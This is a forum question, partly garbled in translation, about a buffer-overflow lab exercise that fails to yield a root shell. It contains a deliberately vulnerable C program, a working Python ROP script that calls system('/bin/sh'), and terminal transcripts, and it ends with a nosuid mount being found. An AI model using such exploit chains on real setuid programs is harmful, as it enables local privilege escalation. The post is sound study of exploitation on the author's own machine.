I have followed several buffer-overflow tutorials, but my problem is that I cannot get a root shell; I always get the normal user shell.
I re-checked the following points, but still could not get a real root shell:
- I set the owner of the binary to root and also set the setuid (s) bit (check)
- I checked that the exploit I am using works correctly: the right addresses are used for system@plt and exit@plt, and the values are loaded into rdi via `pop rdi; ret` gadgets. I do get a shell, just not the root shell I expected (check)
- I heard that dash and bash drop privileges, and that symlinking /bin/sh to /bin/zsh would help, but it did not help me; I still get a non-root shell (check, this approach did not work for me)
- I also tried calling setuid(0) and seteuid(0) in the binary as a test; there is still no root shell (check, does not work for me)
- I also noticed that some people set /proc/sys/kernel/yama/ptrace_scope to 0 (see the message here), but that is not the case for me (the value is 1, and I never touched it) (check, my value is 1, and this should be fine)
- I am using Linux Mint 18.1 Serena; is there perhaps an additional security feature that drops privileges and prevents the root shell?
- . c python script ( vuln()); shell() , @plt ( )
- 'gcc -fno-stack-protector -o ghost ghost.c' ,
- , ? ?
.
Zaphoxx
c:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
/* Target function of the exercise: spawn a shell and terminate.  system()
 * hands "/bin/sh" to the shell interpreter, so the uid of the resulting
 * shell depends on the effective uid this process was given at exec time
 * (and, per the discussion above, on whether the interpreter installed as
 * /bin/sh drops privileges).  exit(0) flushes stdio before the process ends. */
void shell(){
    system("/bin/sh");
    exit(0);
}
int vuln(){
    /* Deliberately vulnerable: up to 128 bytes are read from stdin into a
     * 4-byte stack buffer, so everything past the fourth byte overwrites
     * adjacent stack memory (this is the intended overflow of the exercise).
     * The byte count returned by read() is echoed back unchanged; a failed
     * read (l == -1) is not checked before being passed to write(). */
    char buf[4];
    ssize_t l=0;
    printf("[+] input: ");
    l=read(0,buf,128);
    printf("[+] recv: ");
    write(1,buf,l);
    return 0;
}
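/* Entry point of the deliberately vulnerable test binary.
 *
 * setuid(0)/seteuid(0) only succeed when the effective uid is already 0,
 * i.e. when the set-user-ID bit on the file actually took effect at exec
 * time.  If the bit was ignored (for example because the binary lives on a
 * filesystem mounted nosuid, as the /proc/mounts output further down shows
 * for /home), both calls fail with EPERM.  The original ignored their
 * return values, which hides exactly the condition being debugged here, so
 * a failure is reported on stderr before continuing into vuln(). */
int main(){
    if (setuid(0) != 0) {
        perror("[-] setuid(0)");
    }
    if (seteuid(0) != 0) {
        perror("[-] seteuid(0)");
    }
    vuln();
    return 0;
}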
Python exploit script:
from struct import *
from subprocess import call
# Addresses hard-coded for this particular ./ghost build; they have to be
# re-read from the binary after every recompile (a fixed, non-PIE image is
# assumed here — confirm with the toolchain used).
poprdi=0x4007e3      # "pop rdi; ret" gadget
system_plt=0x400560  # system@plt
exit_plt=0x4005a0    # exit@plt
# Passed to system() as its argument below, so this presumably points at the
# "/bin/sh" string in the binary rather than at the shell() function — confirm.
shell=0x400804
buf=b''
# 24 bytes of filler: buf[4] plus the rest of vuln()'s frame up to the saved
# return address (offset inferred from the build, not derived here — confirm
# against a disassembly of vuln()).
buf+=bytearray("A","utf-8")*24
# Chain: pop rdi <- shell ; system@plt ; pop rdi <- 0 ; exit@plt
buf+=pack("<Q",poprdi)
buf+=pack("<Q",shell)
buf+=pack("<Q",system_plt)
buf+=pack("<Q",poprdi)
buf+=pack("<Q",0)
buf+=pack("<Q",exit_plt)
# NOTE(review): the file is opened in text mode ("w") while buf is bytes;
# under Python 3 this write raises TypeError, so this was presumably run
# under Python 2 — confirm which interpreter produced the "pwn" file used
# in the transcripts below.
with open("pwn","w") as p:
    p.write(buf)

:
execve() , , :
zaphoxx@zaphoxx ~/github/ghostInTheShell $ vim shellcode.c
zaphoxx@zaphoxx ~/github/ghostInTheShell $ gcc -fno-stack-protector -o shell shellcode.c
zaphoxx@zaphoxx ~/github/ghostInTheShell $ sudo chown root:root shell ; sudo chmod 4755 shell
zaphoxx@zaphoxx ~/github/ghostInTheShell $ ll shell
-rwsr-xr-x 1 root root 8608 Oct 17 21:29 shell*
zaphoxx@zaphoxx ~/github/ghostInTheShell $ ./shell
$ id
uid=1000(zaphoxx) gid=1000(zaphoxx) groups=1000(zaphoxx),4(adm),24(cdrom),27(sudo),30(dip),33(www-data),46(plugdev),113(lpadmin),130(sambashare)
$ whoami
zaphoxx
$ exit
zaphoxx@zaphoxx ~/github/ghostInTheShell $ cat shellcode.c
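/* Minimal test program: replace this process with /bin/sh so the shell's
 * uid/euid reveal whether the set-user-ID bit took effect at exec time.
 * (The listing as shown carries no #include lines, so execve() and NULL
 * are unresolved here — the cat output may have lost them.)
 *
 * Returns 127 if execve() fails; execve() only ever returns on failure, and
 * the original fell off the end of main() in that case. */
int main(){
    char *name[2];
    name[0]="/bin/sh";
    name[1]=NULL;
    execve(name[0],name,NULL);
    /* Only reached when execve() failed. */
    return 127;
}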
zaphoxx@zaphoxx ~/github/ghostInTheShell $
;
/bin/sh /bin/zsh, , . :
zaphoxx@zaphoxx ~/github/ghostInTheShell $ ll $(which sh)
lrwxrwxrwx 1 root root 12 Oct 15 22:09 /bin/sh -> /usr/bin/zsh*
zaphoxx@zaphoxx ~/github/ghostInTheShell $
, '/usr/bin/id' , , , :
zaphoxx@zaphoxx ~/github/ghostInTheShell $ ./ghost < pwn
uid=1000(zaphoxx) gid=1000(zaphoxx) groups=1000(zaphoxx),4(adm),24(cdrom),27(sudo),30(dip),33(www-data),46(plugdev),113(lpadmin),130(sambashare)
[+] recv: AAAAAAAAHzaphoxx@zaphoxx ~/github/ghostInTheShell $ ll ./ghost
-rwsr-xr-x 1 root root 8816 Oct 17 22:25 ./ghost*
zaphoxx@zaphoxx ~/github/ghostInTheShell $
zaphoxx@zaphoxx ~/github/ghostInTheShell $ cat ghost.c
/* Variant of shell() that runs id instead of an interactive shell, so the
 * uid/euid the process actually has is printed (see the "./ghost < pwn"
 * transcript above).  exit(0) flushes stdio, which is presumably why the
 * still-buffered "[+] recv:" line shows up after id's output there. */
void shell(){
    system("/usr/bin/id");
    exit(0);
}
int vuln(){
    /* Same intentional overflow as in the first listing: up to 128 bytes are
     * read into a 4-byte stack buffer.  read() does not NUL-terminate, so the
     * "%s" below prints from buf until the first zero byte it finds on the
     * stack, which can be well past the 4 bytes.  The read() result l is no
     * longer used now that the write() is commented out. */
    char buf[4];
    ssize_t l=0;
    l=read(0,buf,128);
    printf("[+] recv: %s",buf);
    //write(1,buf,l);
    return 0;
}
int main(){
    /* Entry point.  The commented-out lines record the author's experiments:
     * calling shell() directly, disabling stdout buffering, and forcing
     * setuid(0)/seteuid(0).  With all of them disabled the process keeps
     * whatever uid/euid the kernel gave it at exec time, which is exactly
     * what the "./ghost < pwn" transcript above measures. */
    //shell();
    //setbuf(stdout,0);
    //setuid(0);
    //seteuid(0);
    vuln();
    return 0;
}
zaphoxx@zaphoxx ~/github/ghostInTheShell $
UPDATE: as K.A.Buhr suggested, I checked /proc/mounts for nosuid:
zaphoxx@zaphoxx ~ $ cat /proc/mounts | grep zaphoxx
/home/zaphoxx/.Private /home/zaphoxx ecryptfs rw,nosuid,nodev,relatime
So my home directory is mounted nosuid — is that the reason?